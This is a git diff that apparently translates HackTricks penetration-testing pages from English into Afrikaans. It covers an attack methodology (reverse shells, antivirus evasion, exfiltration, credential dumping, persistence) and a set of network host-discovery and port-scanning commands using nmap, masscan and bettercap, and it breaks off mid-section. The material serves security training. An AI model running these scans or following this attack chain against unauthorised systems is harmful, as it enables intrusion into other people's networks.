-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Pentesting Methodology +## Pentesting Metodologie
-_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks-logo's ontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ -### 0- Physical Attacks +### 0- Fisiese Aanvalle -Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/). +Het jy **fisiese toegang** tot die masjien wat jy wil aanval? Jy moet 'n paar [**truuks oor fisiese aanvalle**](../physical-attacks/physical-attacks.md) en ander oor [**ontsnapping uit GUI-toepassings**](../physical-attacks/escaping-from-gui-applications/) lees. -### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) +### 1 - [Ontdekking van gasheer binne die netwerk](pentesting-network/#discovering-hosts)/ [Ontdekking van bates van die maatskappy](external-recon-methodology/) -**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test). +**Afhanklik** van of die **toets** wat jy uitvoer 'n **interne of eksterne toets** is, mag jy belangstel om **gasheerders binne die maatskappy se netwerk** (interne toets) of **bates van die maatskappy op die internet** (eksterne toets) te vind. {% hint style="info" %} -Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide. +Let daarop dat as jy 'n eksterne toets uitvoer, sodra jy toegang tot die interne netwerk van die maatskappy verkry, moet jy hierdie gids herbegin. {% endhint %} -### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)** +### **2-** [**Pret hê met die netwerk**](pentesting-network/) **(Intern)** -**This section only applies if you are performing an internal test.**\ -Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing). +**Hierdie afdeling is slegs van toepassing as jy 'n interne toets uitvoer.**\ +Voordat jy 'n gasheer aanval, verkies jy miskien om **sekere legitimasie-inligting** **uit die netwerk** te **steel** of **data** te **sniff** om passief/aktief (MitM) te leer wat jy binne die netwerk kan vind. Jy kan [**Pentesting Network**](pentesting-network/#sniffing) lees. -### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts) +### 3- [Poortskandering - Diensontdekking](pentesting-network/#scanning-hosts) -The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts). +Die eerste ding wat jy moet doen wanneer jy **kwesbaarhede in 'n gasheer soek**, is om te weet watter **dienste op watter poorte loop**. Kom ons kyk na die [**basiese gereedskap om poorte van gasheerders te skandeer**](pentesting-network/#scanning-hosts). -### **4-** [Searching service version exploits](search-exploits.md) +### **4-** [Soek diensweergawe-exploits](search-exploits.md) -Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell... +Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Dalk het jy geluk en daar is 'n exploot wat jou 'n skulpskoot kan gee... -### **5-** Pentesting Services +### **5-** Pentesting-dienste -If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.** +As daar geen fantastiese exploot vir enige lopende diens is nie, moet jy kyk vir **algemene verkeerde konfigurasies in elke lopende diens**. -**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports). +**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is gerangskik volgens hul verstekpoorte). -**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\ -Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here. +**Ek wil graag 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **gedeelte (omdat dit die mees omvattende is).**\ +'n Klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word. -**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any). +**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriale en **laat weet my as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **met die diens te verbind, dit te fuzz en die antwoorde te lees** (as daar enige is). -#### 5.1 Automatic Tools +#### 5.1 Outomatiese Gereedskap -There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.** +Daar is ook verskeie gereedskap wat **outomatiese kwesbaarheidsassesserings** kan uitvoer. **Ek sal aanbeveel dat jy** [**Legion**](https://github.com/carlospolop/legion)** probeer, wat die gereedskap is wat ek geskep het en gebaseer is op die notas oor die pentesting van dienste wat jy in hierdie boek kan vind.** -#### **5.2 Brute-Forcing services** +#### **5.2 Brute-Force-dienste** -In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.** +In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **kompromitteer**. [**Vind hier 'n Spiekbrief van verskillende dienste wat Brute-Force gebruik**](brute-force.md)**.** \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\ +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!\\ {% embed url="https://go.intigriti.com/hacktricks" %} ### 6- [Phishing](phishing-methodology/) -If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): +As jy op hierdie punt nog geen interessante kwesbaarheid gevind het nie, **moet jy dalk 'n bietjie phishing probeer** om toegang tot die netwerk te kry. Jy kan my phishing-metodologie [hier](phishing-methodology/) lees: -### **7-** [**Getting Shell**](shells/) +### **7-** [**Kry 'n Skulpskoot**](shells/) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/). +Op een of ander manier moet jy 'n **manier gevind het om kode uit te voer** op die slagoffer. Dan sou 'n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde skulpskoot te kry, baie nuttig wees](shells/). -Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ +Veral in Windows mag jy dalk hulp nodig hê om **antivirusprogramme te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\ -### 8- Inside +### 8- Binne -If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters: +As jy probleme het met die skulpskoot, kan jy hier 'n klein **samestelling van die mees nuttige opdragte** vir pentesters vind: * [**Linux**](../linux-hardening/useful-linux-commands/) * [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) -* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) +* [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) +### **9 -** [**Uitlekking**](exfiltration.md) -### **9 -** [**Exfiltration**](exfiltration.md) +Jy sal waarskynlik nodig hê om **data uit die slagoffer te onttrek** of selfs iets **in te voer** (soos voorregverhoging skripte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** -You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.** +### **10- Voorregverhoging** -### **10- Privilege Escalation** +#### **10.1- Plaaslike Voorregverhoging** -#### **10.1- Local Privesc** +As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog**.\ +Hier kan jy 'n **gids vind om voorregte plaaslik te verhoog in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ +Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan: -If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\ -Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ -You should also check this pages about how does **Windows work**: +* [**Verifikasie, Legitieme Inligting, Token-voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) +* Hoe werk [**NTLM**](../windows-hardening/ntlm/) +* Hoe om [**legitieme inligting te steel**](broken-reference/) in Windows +* 'n Paar truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/) -* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) -* How does [**NTLM works**](../windows-hardening/ntlm/) -* How to [**steal credentials**](broken-reference/) in Windows -* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +**Moenie vergeet om die beste gereedskap om Windows en Linux plaaslike Voorregverhoging-paaie op te som nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) -**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) +#### **10.2- Domein Voorregverhoging** -#### **10.2- Domain Privesc** - -Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment. +Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te ondersoek, voorregte te verhoog en volhardend te wees in 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Selfs al is dit net 'n subafdeling van 'n afdeling, kan hierdie proses **uiters delikaat** wees in 'n Pentesting/Red Team-opdrag. ### 11 - POST -#### **11**.1 - Looting +#### **11**.1 - Plundering -Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\ -Find here different ways to [**dump passwords in Windows**](broken-reference/). +Kyk of jy meer **wagwoorde** binne die gasheer kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\ +Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](broken-reference/). -#### 11.2 - Persistence +#### 11.2 - Volharding -**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\ -**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** +**Gebruik 2 of 3 verskillende tipes volhardingsmeganismes sodat jy nie weer die stelsel hoef te benut nie.**\ +**Hier kan jy 'n paar** [**volhardingstruuks in 'n aktiewe gids vind**](../windows-hardening/active-directory-methodology/#persistence)**.** -TODO: Complete persistence Post in Windows & Linux +TODO: Voltooi volhardingspos in Windows & Linux ### 12 - Pivoting -With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\ -In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\ -You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\ -Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments.. +Met die **versamelde legitimasie** kan jy toegang hê tot ander masjiene, of miskien moet jy **nuwe gasheer ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\ +In hierdie geval kan tunnelling nodig wees. Hier kan jy [**'n pos vind wat oor tunnelling praat**](tunneling-and-port-forwarding.md).\ +Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, voorregte te verhoog en legitimasie te dump.\ +Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om te pivoteer in Windows-omgewings.. -### MORE +### MEER -#### [Android Applications](../mobile-pentesting/android-app-pentesting/) +#### [Android-toepassings](../mobile-pentesting/android-app-pentesting/) -#### **Exploiting** +#### **Uitbuiting** -* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/) -* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) -* [**Basic exploiting tools**](../exploiting/tools/) +* [**Basiese Linux-uitbuiting**](../exploiting/linux-exploiting-basic-esp/) +* [**Basiese Windows-uitbuiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) +* [**Basiese uitbuitingsgereedskap**](../exploiting/tools/) -#### [**Basic Python**](python/) +#### [**Basiese Python**](python/) -#### **Crypto tricks** +#### **Krypto-truuks** * [**ECB**](../cryptography/electronic-code-book-ecb.md) * [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](../cryptography/padding-oracle-priv.md) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/generic-methodologies-and-resources/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md index 65223ce6e..fb26aa884 100644 --- a/generic-methodologies-and-resources/pentesting-network/README.md +++ b/generic-methodologies-and-resources/pentesting-network/README.md @@ -1,96 +1,85 @@ -# Pentesting Network +# Pentesting Netwerk
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty-tippie**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Discovering hosts from the outside +## Ontdekking van gasheer van buite af -This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\ -In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**. +Dit is 'n **kort afdeling** oor hoe om **IP's te vind wat reageer** vanaf die **Internet**.\ +In hierdie situasie het jy 'n **omvang van IP's** (miskien selfs verskeie **reekse**) en jy wil net uitvind **watter IP's reageer**. ### ICMP -This is the **easiest** and **fastest** way to discover if a host is up or not.\ -You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\ -You could also use **nmap** to send other types of ICMP packets (this will avoid filters to common ICMP echo request-response). - +Dit is die **maklikste** en **vinnigste** manier om uit te vind of 'n gasheer aktief is of nie.\ +Jy kan probeer om 'n paar **ICMP-pakette te stuur** en **verwag antwoorde**. Die maklikste manier is om net 'n **echo-versoek** te stuur en 'n antwoord te verwag. Jy kan dit doen deur 'n eenvoudige `ping` te gebruik of deur `fping` te gebruik vir **reekse**.\ +Jy kan ook **nmap** gebruik om ander tipes ICMP-pakette te stuur (dit sal filters vir gewone ICMP-echo-versoek-antwoord vermy). ```bash ping -c 1 199.66.11.4 # 1 echo request to a host fping -g 199.66.11.0/24 # Send echo requests to ranges nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests ``` +### TCP Poort Ontdekking -### TCP Port Discovery - -It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\ -Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:** - +Dit is baie algemeen om te vind dat alle soorte ICMP-pakette gefiltreer word. Dan kan jy slegs **probeerslag om oop poorte te vind** om te kyk of 'n gasheer aktief is. Elke gasheer het **65535 poorte**, so as jy 'n "groot" omvang het, kan jy nie toets of **elke poort** van elke gasheer oop of toe is nie, dit sal te veel tyd neem.\ +Wat jy nodig het, is 'n **vinnige poortskander** ([masscan](https://github.com/robertdavidgraham/masscan)) en 'n lys van die **mees gebruikte poorte:** ```bash #Using masscan to scan top20ports of nmap in a /24 range (less than 5min) masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24 ``` +Jy kan hierdie stap ook met `nmap` uitvoer, maar dit is stadiger en `nmap` het probleme om gasheerstelsels op te spoor. -You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up. - -### HTTP Port Discovery - -This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**: +### HTTP Poort Ontdekking +Dit is net 'n TCP-poortontdekking wat nuttig is wanneer jy wil fokus op die ontdekking van HTTP-diens. ```bash masscan -p80,443,8000-8100,8443 199.66.11.0/24 ``` +### UDP Poort Ontdekking -### UDP Port Discovery - -You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number: - +Jy kan ook probeer om te kyk vir sommige **UDP-poorte wat oop is** om te besluit of jy meer aandag aan 'n **gasheer** moet gee. Aangesien UDP-diens gewoonlik **nie reageer** met **enige data** op 'n gewone leë UDP-probe-pakket nie, is dit moeilik om te sê of 'n poort gefiltreer of oop is. Die maklikste manier om dit te besluit, is om 'n pakket te stuur wat verband hou met die lopende diens, en aangesien jy nie weet watter diens loop nie, moet jy die mees waarskynlike probeer gebaseer op die poortnommer: ```bash nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24 # The -sV will make nmap test each possible known UDP service packet # The "--version-intensity 0" will make nmap only test the most probable ``` +Die nmap-lyn wat voorheen voorgestel is, sal die **top 1000 UDP-poorte** toets in elke gasheer binne die **/24**-reeks, maar selfs dit sal **>20 minute** neem. As jy **vinnigste resultate** benodig, kan jy [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner) gebruik: `./udp-proto-scanner.pl 199.66.11.53/24` Dit sal hierdie **UDP-ondersoeke** na hul **verwagte poort** stuur (vir 'n /24-reeks sal dit net 1 minuut neem): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ -The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ - -### SCTP Port Discovery - +### SCTP Poort Ontdekking ```bash #Probably useless, but it's pretty fast, why not trying? nmap -T4 -sY -n --open -Pn ``` - ## Pentesting Wifi -Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: +Hier kan jy 'n goeie gids vind van al die bekende Wifi-aanvalle op die tydstip van die skryf: {% content-ref url="../pentesting-wifi/" %} [pentesting-wifi](../pentesting-wifi/) {% endcontent-ref %} -## Discovering hosts from the inside +## Ontdekking van gasheer van binne -If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed: +As jy binne die netwerk is, is een van die eerste dinge wat jy wil doen, om **ander gasheer** te ontdek. Afhangende van **hoeveel geraas** jy kan/wil maak, kan verskillende aksies uitgevoer word: -### Passive - -You can use these tools to passively discover hosts inside a connected network: +### Passief +Jy kan hierdie hulpmiddels gebruik om gasheer passief binne 'n gekoppelde netwerk te ontdek: ```bash netdiscover -p p0f -i eth0 -p -o /tmp/p0f.log @@ -99,12 +88,10 @@ net.recon on/off #Read local ARP cache periodically net.show set net.show.meta true #more info ``` +### Aktief -### Active - -Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: - +Let daarop dat die tegnieke wat in [_**Ontdekking van gasheer van buite af**_](./#ontdekking-van-gasheer-van-buite-af) (_TCP/HTTP/UDP/SCTP-poortontdekking_) bespreek word, hier ook **toegepas kan word**.\ +Maar, aangesien jy in dieselfde netwerk as die ander gasheer is, kan jy **meer dinge doen**: ```bash #ARP discovery nmap -sn #ARP Requests (Discover IPs) @@ -124,103 +111,93 @@ set net.probe.throttle 10 #10ms between probes sent (default=10) #IPv6 alive6 # Send a pingv6 to multicast. ``` +### Aktiewe ICMP -### Active ICMP +Let daarop dat die tegnieke wat in _Ontdekking van gasheer van buite_ ([_**ICMP**_](./#icmp)) bespreek word, ook hier **toegepas kan word**.\ +Maar, aangesien jy in dieselfde netwerk as die ander gasheer is, kan jy **meer dinge doen**: -Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: - -* If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255` -* Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255` -* Use the `-PE`, `-PP`, `-PM` flags of `nmap`to perform host discovery sending respectively **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` +* As jy 'n **subnet-uitsaai-adres ping**, moet die ping na **elke gasheer** aankom en hulle kan aan **jou antwoord**: `ping -b 10.10.5.255` +* Deur die **netwerk-uitsaai-adres te ping**, kan jy selfs gasheer binne **ander subnets** vind: `ping -b 255.255.255.255` +* Gebruik die `-PE`, `-PP`, `-PM` vlae van `nmap` om gasheerontdekking uit te voer deur onderskeidelik **ICMPv4-echo**, **tydstempel** en **subnetmaskerversoeke** te stuur: `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` ### **Wake On Lan** -Wake On Lan is used to **turn on** computers through a **network message**. The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\ -Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\ -If **no \[MAC]** is provided, the packet is sent to **broadcast ethernet** (and the broadcast MAC will be the one being repeated). - +Wake On Lan word gebruik om rekenaars aan te **skakel** deur middel van 'n **netwerkboodskap**. Die sielkundige pakkie wat gebruik word om die rekenaar aan te skakel, is slegs 'n pakkie 